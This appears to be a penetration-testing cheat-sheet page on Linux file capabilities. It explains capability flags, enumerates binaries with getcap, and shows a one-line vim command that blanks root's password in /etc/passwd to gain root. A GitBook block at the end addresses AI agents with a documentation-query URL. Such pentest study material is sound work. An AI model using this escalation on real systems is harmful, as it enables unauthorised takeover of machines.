# Capabilities ## **Set Capability** ```shell-session sudo setcap cap_net_bind_service=+ep /usr/bin/vim.basic ``` | **Capability** | **Description** | | ---------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------- | | `cap_sys_admin` | Allows to perform actions with administrative privileges, such as modifying system files or changing system settings. | | `cap_sys_chroot` | Allows to change the root directory for the current process, allowing it to access files and directories that would otherwise be inaccessible. | | `cap_sys_ptrace` | Allows to attach to and debug other processes, potentially allowing it to gain access to sensitive information or modify the behavior of other processes. | | `cap_sys_nice` | Allows to raise or lower the priority of processes, potentially allowing it to gain access to resources that would otherwise be restricted. | | `cap_sys_time` | Allows to modify the system clock, potentially allowing it to manipulate timestamps or cause other processes to behave in unexpected ways. | | `cap_sys_resource` | Allows to modify system resource limits, such as the maximum number of open file descriptors or the maximum amount of memory that can be allocated. | | `cap_sys_module` | Allows to load and unload kernel modules, potentially allowing it to modify the operating system's behavior or gain access to sensitive information. | | `cap_net_bind_service` | Allows to bind to network ports, potentially allowing it to gain access to sensitive information or perform unauthorized actions. | | **Capability Values** | **Description** | | --------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `=` | This value sets the specified capability for the executable, but does not grant any privileges. This can be useful if we want to clear a previously set capability for the executable. | | `+ep` | This value grants the effective and permitted privileges for the specified capability to the executable. This allows the executable to perform the actions that the capability allows but does not allow it to perform any actions that are not allowed by the capability. | | `+ei` | This value grants sufficient and inheritable privileges for the specified capability to the executable. This allows the executable to perform the actions that the capability allows and child processes spawned by the executable to inherit the capability and perform the same actions. | | `+p` | This value grants the permitted privileges for the specified capability to the executable. This allows the executable to perform the actions that the capability allows but does not allow it to perform any actions that are not allowed by the capability. This can be useful if we want to grant the capability to the executable but prevent it from inheriting the capability or allowing child processes to inherit it. | ## Escalate a user's privileges to `root` | **Capability** | **Desciption** | | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `cap_setuid` | Allows a process to set its effective user ID, which can be used to gain the privileges of another user, including the `root` user. | | `cap_setgid` | Allows to set its effective group ID, which can be used to gain the privileges of another group, including the `root` group. | | `cap_sys_admin` | This capability provides a broad range of administrative privileges, including the ability to perform many actions reserved for the `root` user, such as modifying system settings and mounting and unmounting file systems. | | `cap_dac_override` | Allows bypassing of file read, write, and execute permission checks. | ## Enumerating Capabilities ```shell-session find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; /usr/bin/vim.basic cap_dac_override=eip /usr/bin/ping cap_net_raw=ep /usr/bin/mtr-packet cap_net_raw=ep ``` ## **Exploiting Capabilities** ```shell-session getcap /usr/bin/vim.basic /usr/bin/vim.basic cap_dac_override=eip ``` ```shell-session cat /etc/passwd | head -n1 root:x:0:0:root:/root:/bin/bash ``` ```shell-session /usr/bin/vim.basic /etc/passwd ``` Or: ```shell-session $ echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd $ cat /etc/passwd | head -n1 root::0:0:root:/root:/bin/bash ``` {% content-ref url="/pages/MSoJcmvI1VqZPjZ57oEy" %} [/etc/passwd & /etc/shadow](/0xss0rz/pentest/privilege-escalation/linux/etc-passwd-and-etc-shadow.md) {% endcontent-ref %} ## Resources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/capabilities.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.